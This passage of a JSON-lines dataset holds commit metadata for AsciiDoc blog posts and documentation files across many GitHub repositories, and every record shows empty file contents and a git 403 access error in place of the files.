bi\/spring-boot,ptahchiev\/spring-boot,royclarkson\/spring-boot,eddumelendez\/spring-boot,candrews\/spring-boot,SaravananParthasarathy\/SPSDemo,cleverjava\/jenkins2-course-spring-boot,lenicliu\/spring-boot,lexandro\/spring-boot,srikalyan\/spring-boot,jayarampradhan\/spring-boot,felipeg48\/spring-boot,xiaoleiPENG\/my-project,zhanhb\/spring-boot,pvorb\/spring-boot,mbenson\/spring-boot,lburgazzoli\/spring-boot,mbenson\/spring-boot,deki\/spring-boot,srikalyan\/spring-boot,michael-simons\/spring-boot,royclarkson\/spring-boot,brettwooldridge\/spring-boot,RichardCSantana\/spring-boot,neo4j-contrib\/spring-boot,mbenson\/spring-boot,shakuzen\/spring-boot,joshthornhill\/spring-boot,linead\/spring-boot,philwebb\/spring-boot,drumonii\/spring-boot,mbogoevici\/spring-boot,jmnarloch\/spring-boot,lburgazzoli\/spring-boot,jvz\/spring-boot,sbcoba\/spring-boot,cleverjava\/jenkins2-course-spring-boot,aahlenst\/spring-boot,zhangshuangquan\/spring-root,zhangshuangquan\/spring-root,herau\/spring-boot,NetoDevel\/spring-boot,bclozel\/spring-boot,donhuvy\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/using-spring-boot.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/using-spring-boot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8348d15ec78067e2415e3a78d50b608d6cfbb266","subject":"[DOC] Update lib versions","message":"[DOC] Update lib versions\n","repos":"xjrk58\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"237730314187192ad2fe80e6569042140bf22c09","subject":"Update 2017-01-09-First-blogs-ever.adoc","message":"Update 
2017-01-09-First-blogs-ever.adoc","repos":"baocongchen\/blogs,baocongchen\/blogs,baocongchen\/blogs,baocongchen\/blogs","old_file":"_posts\/2017-01-09-First-blogs-ever.adoc","new_file":"_posts\/2017-01-09-First-blogs-ever.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/baocongchen\/blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6275fcb87ff7cfbc80066a9d9895823313ac7c6","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b18464c2cb828cdc3efc4cfe2b698b246d087c96","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d3073fd0be1d521b83c98a091949ee6b01db5e2","subject":"Add narada-tgms-base.adoc","message":"Add narada-tgms-base.adoc\n","repos":"qarea\/jirams,qarea\/planningms,qarea\/planningms,qarea\/jirams","old_file":"doc\/narada-tgms-base.adoc","new_file":"doc\/narada-tgms-base.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qarea\/jirams.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"158ee23527c5aa5e3e9d762e8271fb578650524c","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"899de8f64012ac8929408409d9dbb38ca9ff1f19","subject":"refactor(Ch1): \u30b5\u30f3\u30d7\u30eb\u306e\u30c7\u30d5\u30a9\u30eb\u30c8\u306f\u6210\u529f\u306b\u3059\u308b","message":"refactor(Ch1): 
\u30b5\u30f3\u30d7\u30eb\u306e\u30c7\u30d5\u30a9\u30eb\u30c8\u306f\u6210\u529f\u306b\u3059\u308b\n\n\u30c7\u30d5\u30a9\u30eb\u30c8\u304c\u5931\u6557\u3060\u3068\u30b5\u30f3\u30d7\u30eb\u304c\u304a\u304b\u3057\u3044\u306e\u304b\u3068\u8aa4\u89e3\u3059\u308b\n","repos":"xifeiwu\/promises-book,genie88\/promises-book,cqricky\/promises-book,purepennons\/promises-book,mzbac\/promises-book,mzbac\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,azu\/promises-book,azu\/promises-book,charlenopires\/promises-book,wenber\/promises-book,purepennons\/promises-book,tangjinzhou\/promises-book,lidasong2014\/promises-book,genie88\/promises-book,cqricky\/promises-book,liyunsheng\/promises-book,charlenopires\/promises-book,dieface\/promises-book,lidasong2014\/promises-book,purepennons\/promises-book,azu\/promises-book,liubin\/promises-book,genie88\/promises-book,tangjinzhou\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,liubin\/promises-book,sunfurong\/promise,liubin\/promises-book,oToUC\/promises-book,oToUC\/promises-book,azu\/promises-book,wangwei1237\/promises-book,wangwei1237\/promises-book,tangjinzhou\/promises-book,wangwei1237\/promises-book,wenber\/promises-book,liyunsheng\/promises-book,charlenopires\/promises-book,cqricky\/promises-book,xifeiwu\/promises-book,sunfurong\/promise,wenber\/promises-book,dieface\/promises-book,mzbac\/promises-book,oToUC\/promises-book","old_file":"Ch1_WhatsPromises\/writing-promises.adoc","new_file":"Ch1_WhatsPromises\/writing-promises.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1e031588cd65e688beb82ecf6579ec7365817e6","subject":"No double log","message":"No double log\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Exceptions.adoc","new_file":"Best practices\/Exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16f6db1df4627deabe1b20f6a4185ab532ca41f0","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b13746af694d172ef9a56ec60b645774c4f27e0","subject":"Update 2017-08-14-Azure-6.adoc","message":"Update 2017-08-14-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-14-Azure-6.adoc","new_file":"_posts\/2017-08-14-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"87d7f0db27eb68e770db88c1e4fcf79b8c4cd672","subject":"Update 2016-10-19-Java-SH-A.adoc","message":"Update 2016-10-19-Java-SH-A.adoc","repos":"SnorlaxH\/blog.urusa.me,SnorlaxH\/blog.urusa.me,SnorlaxH\/blog.urusa.me,SnorlaxH\/blog.urusa.me","old_file":"_posts\/2016-10-19-Java-SH-A.adoc","new_file":"_posts\/2016-10-19-Java-SH-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SnorlaxH\/blog.urusa.me.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1b6c2be625c0d44335d6c799a5b987462ff10be","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1da9a2370d23f5bc0fbb6423a141af40199b2162","subject":"Update 2015-09-03-One.adoc","message":"Update 2015-09-03-One.adoc","repos":"manueljordan\/manueljordan.github.io,manueljordan\/manueljordan.github.io,manueljordan\/manueljordan.github.io","old_file":"_posts\/2015-09-03-One.adoc","new_file":"_posts\/2015-09-03-One.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manueljordan\/manueljordan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21cad626a61ffa840002ba63466d3e0abcfe6c1c","subject":"Update 2017-01-21-Dev-Ops-Server-SSH.adoc","message":"Update 2017-01-21-Dev-Ops-Server-SSH.adoc","repos":"iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io","old_file":"_posts\/2017-01-21-Dev-Ops-Server-SSH.adoc","new_file":"_posts\/2017-01-21-Dev-Ops-Server-SSH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iamthinkking\/iamthinkking.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0fb1ad0297d99d8a8b5960887e8eb46f28218c0","subject":"Update 2017-05-01-UIUCTF-2017-Crypto.adoc","message":"Update 2017-05-01-UIUCTF-2017-Crypto.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-05-01-UIUCTF-2017-Crypto.adoc","new_file":"_posts\/2017-05-01-UIUCTF-2017-Crypto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ffcf2ae5839015360d4efe3413bd57b8fd7f6967","subject":"Update 2015-09-23-When-it-hits-it-hurts-doesnt-it.adoc","message":"Update 2015-09-23-When-it-hits-it-hurts-doesnt-it.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-When-it-hits-it-hurts-doesnt-it.adoc","new_file":"_posts\/2015-09-23-When-it-hits-it-hurts-doesnt-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned 
error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46fb04d531167af40db447da8d721cefd0fe5569","subject":"Update 2016-19-05-Scala-training-camp-at-Lunatech.adoc","message":"Update 2016-19-05-Scala-training-camp-at-Lunatech.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-19-05-Scala-training-camp-at-Lunatech.adoc","new_file":"_posts\/2016-19-05-Scala-training-camp-at-Lunatech.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be8e1ef8fea2e20605ec8a5881b03f526edd1a4c","subject":"my MeteorJS talk links to slides and demo","message":"my MeteorJS talk links to slides and demo\n","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2015-11-20-MeteorJS-intro-meetup-14-nantesjs.adoc","new_file":"_posts\/2015-11-20-MeteorJS-intro-meetup-14-nantesjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66cf497a3fa8dd8db65436ef6c5e37bbe525ca8a","subject":"y2b create post How to charge your iPhone without wires!","message":"y2b create post How to charge your iPhone without wires!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-08-How-to-charge-your-iPhone-without-wires.adoc","new_file":"_posts\/2016-07-08-How-to-charge-your-iPhone-without-wires.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"388a0565e34418d9bbe5bef5b37538e1f7ef7656","subject":"Update 2015-04-28-Test-Post.adoc","message":"Update 2015-04-28-Test-Post.adoc","repos":"therebelrobot\/blog-n.ode.rocks,therebelrobot\/blog-n.ode.rocks,therebelrobot\/blog-n.ode.rocks","old_file":"_posts\/2015-04-28-Test-Post.adoc","new_file":"_posts\/2015-04-28-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/therebelrobot\/blog-n.ode.rocks.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f4b21b0c6a015ff5cb1b319ea6f6bf5433efa56","subject":"Update 2016-02-04-Inception.adoc","message":"Update 2016-02-04-Inception.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-04-Inception.adoc","new_file":"_posts\/2016-02-04-Inception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0f713d2704a8433ad6005bc776108ac20904e6a","subject":"Update 2017-03-25-create-pc.adoc","message":"Update 
2017-03-25-create-pc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-create-pc.adoc","new_file":"_posts\/2017-03-25-create-pc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"482b3edc3a33ce3bb06e1cd3925a4ebc72b22a0f","subject":"Update 2017-07-16-July-2017.adoc","message":"Update 2017-07-16-July-2017.adoc","repos":"TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io","old_file":"_posts\/2017-07-16-July-2017.adoc","new_file":"_posts\/2017-07-16-July-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TsungmingLiu\/tsungmingliu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63542df8e0e474436fcc92203c00ecbba788f7d2","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a70862246cfa3d26bdd11dfa68bb5a9e711b4db","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d151224fa5f9367429a37a09455d7bc013113883","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4469fe140eec7040127b412df8106f4ea12077c","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 
2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96516b5df7d6fa3609445c1b4c94f958690935ba","subject":"Update 2016-06-02-first-blog.adoc","message":"Update 2016-06-02-first-blog.adoc","repos":"chdask\/chdask.github.io,chdask\/chdask.github.io,chdask\/chdask.github.io,chdask\/chdask.github.io","old_file":"_posts\/2016-06-02-first-blog.adoc","new_file":"_posts\/2016-06-02-first-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chdask\/chdask.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c18a730587378a0b47b31dac00063623e8d9a43","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d088af7a66a1a52e08bacf3fb2f2a12001da3509","subject":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","message":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fd0daa3b8f4418a3456c77b8895d9530c81682a","subject":"Update 2015-08-29-Ruby.adoc","message":"Update 2015-08-29-Ruby.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-08-29-Ruby.adoc","new_file":"_posts\/2015-08-29-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9c875bd9b7fc6295a85bfa0972a14bcbb7394e3","subject":"Create CONTRIBUTING.adoc","message":"Create CONTRIBUTING.adoc","repos":"synyx\/urlaubsverwaltung,synyx\/urlaubsverwaltung,synyx\/urlaubsverwaltung,synyx\/urlaubsverwaltung","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/synyx\/urlaubsverwaltung.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2d5edbc647cb3569ff520be1e588d20b717957e2","subject":"Update 
2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","message":"Update 2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","new_file":"_posts\/2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d26dbdbc61b89a8a7b6c006ab39aa39a7befdc2b","subject":"Update 2015-10-07-Episode-24-Small-Wheel-No-Jackpots-Lit.adoc","message":"Update 2015-10-07-Episode-24-Small-Wheel-No-Jackpots-Lit.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-10-07-Episode-24-Small-Wheel-No-Jackpots-Lit.adoc","new_file":"_posts\/2015-10-07-Episode-24-Small-Wheel-No-Jackpots-Lit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28547a852d707e0282e0229d0667d597bfba98a5","subject":"Update 2016-10-28-innovation-Engineer-Blog-Authors.adoc","message":"Update 2016-10-28-innovation-Engineer-Blog-Authors.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-28-innovation-Engineer-Blog-Authors.adoc","new_file":"_posts\/2016-10-28-innovation-Engineer-Blog-Authors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e5395f6f1ebbe439c9df0d93769a7911bfc8888","subject":"Update 2018-03-06-Creating-a-custom-select-element.adoc","message":"Update 2018-03-06-Creating-a-custom-select-element.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c33832de9b712fbe4fafd6ec6018800fcee3cc5","subject":"y2b create post Dead Island Unboxing (Special Edition) PS3","message":"y2b create post Dead Island Unboxing (Special Edition) PS3","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-07-Dead-Island-Unboxing-Special-Edition-PS3.adoc","new_file":"_posts\/2011-09-07-Dead-Island-Unboxing-Special-Edition-PS3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22688bfe2a02742524a3f2b31531818d8681064d","subject":"Update 2017-08-05-Criando-um-carrinho-de-compras-com-Vuejs.adoc","message":"Update 2017-08-05-Criando-um-carrinho-de-compras-com-Vuejs.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2017-08-05-Criando-um-carrinho-de-compras-com-Vuejs.adoc","new_file":"_posts\/2017-08-05-Criando-um-carrinho-de-compras-com-Vuejs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9385b49067d8bd938515ec479a699f653b1c1ebc","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e0b13307783109c5d166eec726328ce60bf716e","subject":"Update 2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","message":"Update 2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","new_file":"_posts\/2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d546a2483182e948db1245ad003034e3fac9713c","subject":"Update 2017-6-1-Si-aprendes-a-ejercitarte-aprendes-a-emprender-Mas-Sano-23.adoc","message":"Update 